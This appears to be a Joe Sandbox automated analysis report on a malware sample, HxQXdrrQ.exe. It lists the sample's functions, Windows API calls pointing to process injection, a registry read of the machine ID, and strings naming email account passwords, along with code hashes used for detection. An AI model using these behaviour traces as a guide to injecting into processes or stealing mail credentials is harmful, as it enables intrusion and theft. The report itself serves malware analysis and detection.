String ID:
API String ID: 983334009-0
Opcode ID: 8c1f44917de89e54155f732446ab866987be2a8ab52b6ede6a7a94f4852cdb45
Instruction ID: 80519161d625c055d7f0ac115c076f51a5a68e55da462b1ebe55e5c3cde0a078
Opcode Fuzzy Hash: 8c1f44917de89e54155f732446ab866987be2a8ab52b6ede6a7a94f4852cdb45
Instruction Fuzzy Hash: 032115B1D002098FEB10DFAAC485BEEBBF4EF48314F14842AD559A7341CB78A945CFA1

Function 00D9D6A1 Relevance: 1.6, APIs: 1, Instructions: 60COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00D9D66E,?,?,?,?,?), ref: 00D9D72F

Memory Dump Source

Source File: 0000000A.00000002.2109322857.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_d90000_HxQXdrrQ.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: a973ab96f55048436cf1aeaea8eeb8e285c72dd52447335ca9bc45085977b065
Instruction ID: 2e7ca04f5fa917ddab19b84e761a86fe84c3596d0fcd835be8bcd0ef2e8c3a2a
Opcode Fuzzy Hash: a973ab96f55048436cf1aeaea8eeb8e285c72dd52447335ca9bc45085977b065
Instruction Fuzzy Hash: 3821E4B59002489FDB10CFA9D584ADEFBF5FB48310F14801AE918A3350D378A944CF64

Function 071F08EC Relevance: 1.6, APIs: 1, Instructions: 56windowCOMMON

Download Yara Rule

APIs

CreateIconFromResourceEx.USER32(?,?,?,?,?,?,?,?,?,?,071F2E6A,?,?,?,?,?), ref: 071F2F0F

Memory Dump Source

Source File: 0000000A.00000002.2117086589.00000000071F0000.00000040.00000800.00020000.00000000.sdmp, Offset: 071F0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_71f0000_HxQXdrrQ.jbxd

Similarity

API ID: CreateFromIconResource
String ID:
API String ID: 3668623891-0
Opcode ID: 52733fb7fae65966b61a3f8296bea2ff9ce49afd395c0ac1313d66dcd2c49f51
Instruction ID: 5e3af9885c5d4ec443c9fe3d10989f89f5a4c99517a74a3404849bcd98fe281d
Opcode Fuzzy Hash: 52733fb7fae65966b61a3f8296bea2ff9ce49afd395c0ac1313d66dcd2c49f51
Instruction Fuzzy Hash: 9B1137B58002499FDB10DF9AC844BEEBFF8FF49310F14841AEA14A7250C379A954DFA4

Function 06F96868 Relevance: 1.6, APIs: 1, Instructions: 55memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F968DE

Memory Dump Source

Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 826fb1fd3616bd6ea0b16064b03d00cfe3438e13ca7b4903377179396f29b355
Instruction ID: 0f82761c00ff6f450ac2f9c600bbecf9a6eb153d67cc191b7376a7d1df241005
Opcode Fuzzy Hash: 826fb1fd3616bd6ea0b16064b03d00cfe3438e13ca7b4903377179396f29b355
Instruction Fuzzy Hash: 5E1117719003499FDB10DFAAC845ADEBBF5EF48314F248419E519A7250CB75A554CBA0

Function 06F96870 Relevance: 1.6, APIs: 1, Instructions: 53memoryCOMMON

Download Yara Rule

APIs

VirtualAllocEx.KERNELBASE(?,?,?,?,?), ref: 06F968DE

Memory Dump Source

Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 0e3424c1589b3ddd8572728fcc2667d47913de35e37c62e419a866827d989b38
Instruction ID: f646d6e574cd81fa468e559567217754b084494fe7355fa42a4a482248a42509
Opcode Fuzzy Hash: 0e3424c1589b3ddd8572728fcc2667d47913de35e37c62e419a866827d989b38
Instruction Fuzzy Hash: 37113771C002499FDB10DFAAC844AEEFFF5EF48314F208419E519A7250CB79A544CFA0

Function 06F962A9 Relevance: 1.6, APIs: 1, Instructions: 51threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06F96312

Memory Dump Source

Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: e58139d173603d4b7b4384329983a061ad9789383e6d03f40ceb7799940a5058
Instruction ID: 5db4be207a5e64c20dccc3d57d807aa8ec314735696459fefdcf4ee01801d07d
Opcode Fuzzy Hash: e58139d173603d4b7b4384329983a061ad9789383e6d03f40ceb7799940a5058
Instruction Fuzzy Hash: 531119B1D003498BDB20DFAAC44579EFBF5EF49314F208419D519A7250CB79A545CBA0

Function 06F962B0 Relevance: 1.5, APIs: 1, Instructions: 49threadCOMMON

Download Yara Rule

APIs

ResumeThread.KERNELBASE ref: 06F96312

Memory Dump Source

Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd

Similarity

API ID: ResumeThread
String ID:
API String ID: 947044025-0
Opcode ID: f80ba84e2e2869a67a50e1bfe4b3debc15a5b1d765199804d23c1158c9857048
Instruction ID: ef0579ce1bb24f87143bb4fa3f676e4d6963a839b60dab531e969ea263857822
Opcode Fuzzy Hash: f80ba84e2e2869a67a50e1bfe4b3debc15a5b1d765199804d23c1158c9857048
Instruction Fuzzy Hash: 311128B1D002488BDB20DFAAC445BEEFBF9EF88314F208419D519A7250CB79A544CBA0

Function 06F93434 Relevance: 1.5, APIs: 1, Instructions: 47windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06F9A315

Memory Dump Source

Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 8e6e74ce453d57147bf6dc21f9c239642e688382f51fe801f561d329e6f8eaf7
Instruction ID: 2a040d1db9b1dc0df400354600867562ce80313d15504fb044e6a404a5ceded2
Opcode Fuzzy Hash: 8e6e74ce453d57147bf6dc21f9c239642e688382f51fe801f561d329e6f8eaf7
Instruction Fuzzy Hash: 211106B58003489FDB10DF9AC449BDEFBF8EB48314F108419E918A7610D375A944CFA1

Function 00D9B3B8 Relevance: 1.5, APIs: 1, Instructions: 47COMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00D9B41E

Memory Dump Source

Source File: 0000000A.00000002.2109322857.0000000000D90000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_d90000_HxQXdrrQ.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 52ab4a0850d7a83b08cc82d0d9db302a060d2eeaaec68e160d4397fadf77ceef
Instruction ID: 74194137656c164295d484d854c2923120594e8a0712e1109e38f8c307b2aceb
Opcode Fuzzy Hash: 52ab4a0850d7a83b08cc82d0d9db302a060d2eeaaec68e160d4397fadf77ceef
Instruction Fuzzy Hash: 171110B5C002498FCB10DF9AD544ADEFBF8EF88328F14841AD419A7710C379A545CFA1

Function 06F9A2B1 Relevance: 1.5, APIs: 1, Instructions: 45windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000010,00000000,?), ref: 06F9A315

Memory Dump Source

Source File: 0000000A.00000002.2116885951.0000000006F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 06F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_6f90000_HxQXdrrQ.jbxd

Similarity

API ID: MessagePost
String ID:
API String ID: 410705778-0
Opcode ID: 7c16d42bdac1c2c3aa3d60d996faf1b7d15d27768aad2e5d6fc2bb195bbe94a6
Instruction ID: 4f45cac7792664d7d9984d7f5cdc52228a7370dba3e99fce05d2ced4cc95d050
Opcode Fuzzy Hash: 7c16d42bdac1c2c3aa3d60d996faf1b7d15d27768aad2e5d6fc2bb195bbe94a6
Instruction Fuzzy Hash: 1511F5B58003499FDB10DF99C885BDEFBF8EB48314F208419D958A7650C379A944CFA1

Function 00A8D4C4 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2108575004.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a8d000_HxQXdrrQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13769ba24ac708606971ac96c516d00a30d97eabe18ba2965f09ae61a95bb49e
Instruction ID: 324f2deb859a3c103e0a3e14ad637344879f9f54d5caa4186a9eacde4bb4ab4b
Opcode Fuzzy Hash: 13769ba24ac708606971ac96c516d00a30d97eabe18ba2965f09ae61a95bb49e
Instruction Fuzzy Hash: 3A212571500240EFCB09EF14D9C0F26BF65FB98318F20C56AE9090B296C33AD816DBA2

Function 00A8D3D8 Relevance: .1, Instructions: 75COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2108575004.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a8d000_HxQXdrrQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fdc9964e749bd46aa2f555dbcf3a9ece4d1b020a75cee9988cc6f6d290cd2061
Instruction ID: a0a91e1936021ab255eebf18cc05a22ab4165bc4cb4c99122db9b905824ea1c4
Opcode Fuzzy Hash: fdc9964e749bd46aa2f555dbcf3a9ece4d1b020a75cee9988cc6f6d290cd2061
Instruction Fuzzy Hash: 18210775504204EFDB05EF14D9C0F26BF65FB98324F24C569E9090F296C33AE856DBA2

Function 00A9D01C Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2108630517.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a9d000_HxQXdrrQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 59756a6e05faa9434343fda7011df9d2f686d341013fed3cda4780f15db25455
Instruction ID: b915aa4e678e6154dbcf265b8b10d36e1e9572e9b4a65f3a52af690b6f0e38eb
Opcode Fuzzy Hash: 59756a6e05faa9434343fda7011df9d2f686d341013fed3cda4780f15db25455
Instruction Fuzzy Hash: 1E21F271604204DFDF14DF24D984B26BFA5FB88314F20C569D94A4B296C33AD887CA61

Function 00A9D1D4 Relevance: .1, Instructions: 72COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2108630517.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a9d000_HxQXdrrQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 878896f630e6495125aeaf7def8781c6502efe0cb0b001a908c54ece22de3df6
Instruction ID: 37690eaf0f5a302ba787f3349f1b142f086543cf343d1a27583298892da28059
Opcode Fuzzy Hash: 878896f630e6495125aeaf7def8781c6502efe0cb0b001a908c54ece22de3df6
Instruction Fuzzy Hash: EB210475604204EFDF05DF24D9C0F26BBA5FB98314F20CA6DE9094F296C33AD886CA61

Function 00A9D006 Relevance: .1, Instructions: 60COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2108630517.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a9d000_HxQXdrrQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1211759a5e7aa14f33aff2f6042116e44c9be5f5922f489c0b495c39006726f2
Instruction ID: 93f53482ee3a57d3fb8b8fab1e8b0f2e9071e82d3651d6b8cbafd1463964816d
Opcode Fuzzy Hash: 1211759a5e7aa14f33aff2f6042116e44c9be5f5922f489c0b495c39006726f2
Instruction Fuzzy Hash: E221C6755093808FDB02CF24D594715BFB1FB46314F28C5DAD8498B297C33AD84ACB62

Function 00A8D4BF Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2108575004.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a8d000_HxQXdrrQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 322aff09762c0e8b3f453f798eda80b040bf8549613cebed63eac7b491538f93
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: 94112672404280CFCB06DF10D5C4B16BF71FB98314F24C6AAD8490B656C336D85ACBA2

Function 00A8D3D3 Relevance: .1, Instructions: 56COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2108575004.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a8d000_HxQXdrrQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction ID: 24685cd29012bcc18f4017f4ca12a22d02e75930399bbaf526ad3387910b05cf
Opcode Fuzzy Hash: be84e5d2ba6eb25d2e30d29f2c5ffdc4cdcd384a79140dda988d9b090738847a
Instruction Fuzzy Hash: D7112672404240DFCB02DF00D5C4B16BF71FB94324F24C6A9DD090B256C33AE85ACBA2

Function 00A9D1CF Relevance: .1, Instructions: 53COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2108630517.0000000000A9D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A9D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a9d000_HxQXdrrQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction ID: 6ba14f4217273cfdb2f3254bdf6b9fe0d613e97e940ea8d0151b5c1a8ca95ce1
Opcode Fuzzy Hash: 945d3a080ad63b5e32bcc5b18ec1e97d0272151c1fb78e482730898ede984437
Instruction Fuzzy Hash: 0E118B75604280DFDB16CF14D5C4B55BBA1FB84314F24C6A9D8494B696C33AD84ACB62

Function 00A8D745 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2108575004.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a8d000_HxQXdrrQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b746a074daab520f9c89d339ed637f4ceb088f93f5dbc67ddc33f06e9005c4c
Instruction ID: 3e1053e1c926d40a4537a74a7bfa55a603cc305eeda3cb923e0b9ccf89cae196
Opcode Fuzzy Hash: 5b746a074daab520f9c89d339ed637f4ceb088f93f5dbc67ddc33f06e9005c4c
Instruction Fuzzy Hash: C601A7710043449AE720AF55CD84B66BFACEF45364F18C52AED090A2D6D6799841CB75

Function 00A8D744 Relevance: .0, Instructions: 36COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000A.00000002.2108575004.0000000000A8D000.00000040.00000800.00020000.00000000.sdmp, Offset: 00A8D000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_10_2_a8d000_HxQXdrrQ.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1393b351980418aae5b4ab62d2c6252cca4a4e31ba7de743f42114413ceba17d
Instruction ID: 3e08094933052e715e43c74390afd03477af09c102c99842618c6371b6646db2
Opcode Fuzzy Hash: 1393b351980418aae5b4ab62d2c6252cca4a4e31ba7de743f42114413ceba17d
Instruction Fuzzy Hash: 03F06D71404344AEE7209F1AC988B66FFA8EF96734F18C45AED484E296C2799C44CBB1

Analysis Process: HxQXdrrQ.exePID: 7096, Parent PID: 1632COMMON

Execution Graph

Execution Coverage:	3%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	1.3%
Total number of Nodes:	302
Total number of Limit Nodes:	13

Executed Functions

Function 00413866 Relevance: 4.6, APIs: 3, Instructions: 147
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000003,00000000,D1E96FCD,00000000,00000000,00000000,00000000), ref: 00413885
CreateMutexW.KERNELBASE(00000000,00000001,00000000,00000000,CF167DF4,00000000,00000000), ref: 0041399C
GetLastError.KERNEL32 ref: 0041399E

Memory Dump Source

Source File: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_HxQXdrrQ.jbxd

Yara matches

Similarity

API ID: Error$CreateLastModeMutex
String ID:
API String ID: 3448925889-0
Opcode ID: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
Instruction ID: 7738172b6d33d5602fc402945caed90a0cea100ae195543e4e9fee3f6653e559
Opcode Fuzzy Hash: 24802840a9e80e41c8200fa87372d6a1c573b20100aacb3c492bf68185cebf66
Instruction Fuzzy Hash: 11415E61964348A8EB10ABF1AC82EFFA738EF54755F10641FF504F7291E6794A80836E

Function 00404A52 Relevance: 3.1, APIs: 2, Instructions: 63
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 00402B7C: GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
Part of subcall function 00402B7C: HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

RegOpenKeyExA.KERNELBASE(00000032,?,00000000,00020119,00000000,00000009,F4B4ACDC,00000000,00000000,MachineGuid,00000032,00000000,00413DA5,00413987), ref: 00404A9A
RegQueryValueExA.KERNELBASE(?,00000000,00000000,00000000,00000000,00000009,00000009,FE9F661A,00000000,00000000), ref: 00404ABC

Memory Dump Source

Source File: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_HxQXdrrQ.jbxd

Yara matches

Similarity

API ID: Heap$AllocOpenProcessQueryValue
String ID:
API String ID: 3676486918-0
Opcode ID: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
Instruction ID: c751ae4fb1a51baa23b068920df28fa5e45e9ad9ad003da97b765f6d6e9ada80
Opcode Fuzzy Hash: df5e51209e30d87507a4750a0631f6435c2f152f95c8b1de61f5c825813b11bc
Instruction Fuzzy Hash: A301B1B264010C7EEB01AED69C86DBF7B2DDB81798B10003EF60475182EAB59E1156B9

Function 00404DF3 Relevance: 1.5, APIs: 1, Instructions: 13
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WSAStartup.WS2_32(00000202,?), ref: 00404E08

Memory Dump Source

Source File: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_HxQXdrrQ.jbxd

Yara matches

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction ID: edfb6e6a7b2c2d2c81179f298452045bbfcf768a57aceb16f5d93ae35c4528ea
Opcode Fuzzy Hash: aec8cb7098972fa6752499418e154eb0e8b54166df737fc870e0652f0f0fb75e
Instruction Fuzzy Hash: 6EC08C32AA421C9FD750AAB8AD0FAF0B7ACD30AB02F0002B56E1DC60C1E550582906E2

Function 00402C1F Relevance: 1.5, APIs: 1, Instructions: 12
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryW.KERNELBASE(?,00000000,E811E8D4,00000000,00000000), ref: 00402C34

Memory Dump Source

Source File: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_HxQXdrrQ.jbxd

Yara matches

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
Instruction ID: cd53f9395925d29cf68d66af6aae64644fca58afce9bbcd5edfe8b9605b00cd0
Opcode Fuzzy Hash: 1e00aa432103c00395cacdadc05548eaee9b0074d701dd53c2a9d16b249f06e7
Instruction Fuzzy Hash: C9B092B00082083EAA002EF59C05C7F3A4DDA4410874044397C08E5411F937DE1012A5

Function 00413A3F Relevance: 1.5, APIs: 1, Instructions: 12
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ExitProcess.KERNEL32(00000000,00000000,E567384D,00000000,00000000,?,00413B8D,00000000,?,?,004139CC,00000000), ref: 00413A54

Memory Dump Source

Source File: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_HxQXdrrQ.jbxd

Yara matches

Similarity

API ID: ExitProcess
String ID:
API String ID: 621844428-0
Opcode ID: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
Instruction ID: a51fc36abc950c8e07eb8ba8f8e19e2949325f4e0a3e122df0d5a7568418e784
Opcode Fuzzy Hash: 28892627b4184eb34835cb905e0569b311a61ada9086cb921d1e57989bacd3e5
Instruction Fuzzy Hash: 52B092B11042087EAA402EF19C05D3B3A4DCA44508B0044357C08E5422E936EE2050A4

Function 004049FF Relevance: 1.5, APIs: 1, Instructions: 11
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegCloseKey.KERNELBASE(00000000,00000009,D980E875,00000000,00000000,?,00404A44,?,?,00404AC6,?), ref: 00404A15

Memory Dump Source

Source File: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_HxQXdrrQ.jbxd

Yara matches

Similarity

API ID: Close
String ID:
API String ID: 3535843008-0
Opcode ID: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
Instruction ID: 75bcc15c4d71fff8019d16f1d9debb39272117f3de5fdcc107556e34aff8dcac
Opcode Fuzzy Hash: fd13a4ababa05b6dfa8c376aed1a70cd2f6ce4ef8af563d78b915090b99271a8
Instruction Fuzzy Hash: 7CC092312843087AEA102AE2EC0BF093E0D9B41F98F500025B61C3C1D2E9E3E6100099

Non-executed Functions

Function 0040434D Relevance: 15.1, APIs: 10, Instructions: 135memorycomCOMMON

Download Yara Rule

APIs

CoInitialize.OLE32(00000000), ref: 0040438F
CoCreateInstance.OLE32(00418EC0,00000000,00000001,00418EB0,?), ref: 004043A9
VariantInit.OLEAUT32(?), ref: 004043C4
SysAllocString.OLEAUT32(?), ref: 004043CD
VariantInit.OLEAUT32(?), ref: 00404414
SysAllocString.OLEAUT32(?), ref: 00404419
VariantInit.OLEAUT32(?), ref: 00404431

Memory Dump Source

Source File: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_HxQXdrrQ.jbxd

Yara matches

Similarity

API ID: InitVariant$AllocString$CreateInitializeInstance
String ID:
API String ID: 1312198159-0
Opcode ID: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
Instruction ID: 6cc2ba4480fbb4d68866773ab5e076051400aafb7d2546f6199fc19a864342a4
Opcode Fuzzy Hash: 513fbf6384ec98fcae1358c4661a671bc025351e7b653efb5643f1f3667a8473
Instruction Fuzzy Hash: 9A414C71A00609EFDB00EFE4DC84ADEBF79FF89314F10406AFA05AB190DB759A458B94

Function 0040D069 Relevance: 12.6, Strings: 10, Instructions: 138COMMON

Download Yara Rule

Strings

SmtpPort, xrefs: 0040D0EB
PopPassword, xrefs: 0040D0D0
Technology, xrefs: 0040D08D
EmailAddress, xrefs: 0040D074
PopAccount, xrefs: 0040D0B6
SmtpServer, xrefs: 0040D0DC
SmtpAccount, xrefs: 0040D0FA
SmtpPassword, xrefs: 0040D117
PopServer, xrefs: 0040D099
PopPort, xrefs: 0040D0A7

Memory Dump Source

Source File: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_HxQXdrrQ.jbxd

Yara matches

Similarity

API ID:
String ID: EmailAddress$PopAccount$PopPassword$PopPort$PopServer$SmtpAccount$SmtpPassword$SmtpPort$SmtpServer$Technology
API String ID: 0-2111798378
Opcode ID: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction ID: 091e628055053f5eef329adcdd4db079f25726ad560f051e033024c376855220
Opcode Fuzzy Hash: 4f23c8655d16a9709c8d74bd686147b8dbb65e0931b573aa619d5bf1b9c89d18
Instruction Fuzzy Hash: AE414EB5941218BADF127BE6DD42F9E7F76EF94304F21003AF600721B2C77A99609B48

Function 00402B7C Relevance: 2.5, APIs: 2, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,?,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E), ref: 00402B85
HeapAlloc.KERNEL32(00000000,?,?,0040328C,000001E0,?,?,?,0040320D,?,?,?,00413864,00000000,EEF0D05E,00000000), ref: 00402B8C

Memory Dump Source

Source File: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_HxQXdrrQ.jbxd

Yara matches

Similarity

API ID: Heap$AllocProcess
String ID:
API String ID: 1617791916-0
Opcode ID: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction ID: b98118a04cfb303fc975c2cf6dbcabe8739d57b69ee549b18d4bacd194132a09
Opcode Fuzzy Hash: 06d42fc3960a44692cfa347aceea0432181886377ca781978571395af1b358ed
Instruction Fuzzy Hash: 14D05E36A01A24B7CA212FD5AC09FCA7F2CEF48BE6F044031FB0CAA290D675D91047D9

Function 00404ED4 Relevance: 1.5, APIs: 1, Instructions: 9networkCOMMON

Download Yara Rule

APIs

recv.WS2_32(00000000,00000000,00000FD0,00000000), ref: 00404EE2

Memory Dump Source

Source File: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_HxQXdrrQ.jbxd

Yara matches

Similarity

API ID: recv
String ID:
API String ID: 1507349165-0
Opcode ID: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction ID: cd18cecc4e97c8ae47002f9e4185d290addc31a5a75b3629954b28b764c5713b
Opcode Fuzzy Hash: 21ce8f986ded34978476a8ad781d548340edbce2afa6bcd3c515a11396da2d1b
Instruction Fuzzy Hash: 6EC0483204020CFBCF025F81EC05BD93F2AFB48760F448020FA1818061C772A520AB88

Function 0040317B Relevance: .0, Instructions: 46COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000F.00000002.2088465088.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_15_2_400000_HxQXdrrQ.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction ID: 125f84157e295c2adc52e6f8c9cb261871d96e12da6c9e12f7e31892ee598d11
Opcode Fuzzy Hash: 5b57611fa40680ed248d57f37b4973e9bad199baf80beacdc2a2503593addd55
Instruction Fuzzy Hash: 0B01A272A10204ABDB21DF59C885E6FF7FCEB49761F10417FF804A7381D639AE008A64

Function 004061C3 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 151COMMON

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,?,?,?,00414449), ref: 004061F4
_wmemset.LIBCMT ref: 00406244
